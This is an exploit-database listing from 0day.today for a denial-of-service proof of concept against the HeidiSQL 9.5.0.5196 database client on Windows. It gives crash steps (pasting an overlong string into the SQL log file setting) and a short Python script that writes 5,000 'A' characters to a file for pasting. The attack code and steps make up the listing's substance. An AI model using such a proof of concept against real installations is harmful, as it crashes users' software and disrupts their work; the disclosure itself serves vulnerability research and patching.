[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HeidiSQL 9.5.0.5196 - Denial of Service Exploit

Author
Victor Mondragón
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31566
Category
dos / poc
Date add
12-11-2018
Platform
windows
# Exploit Title: HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Vendor Homepage: https://www.heidisql.com/
# Software Link: https://www.heidisql.com/download.php
# Tested Version: 9.5.0.5196
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
 
#Steps to produce the crash:
#1.- Run python code: HeidiSQL 9.5.0.5196.py
#2.- Open bd.txt and copy content to clipboard
#2.- Open HeidiSQL
#3.- Select "More"
#4.- Select "Preferences" > "Logging"
#5.- Select "Write SQL log to file" and Paste ClipBoard
#6.- Click on "OK"
#7.- Crashed
 
cod = "\x41" * 5000
 
f = open('bd.txt', 'w')
f.write(cod)
f.close()

#  0day.today [2024-06-30]  #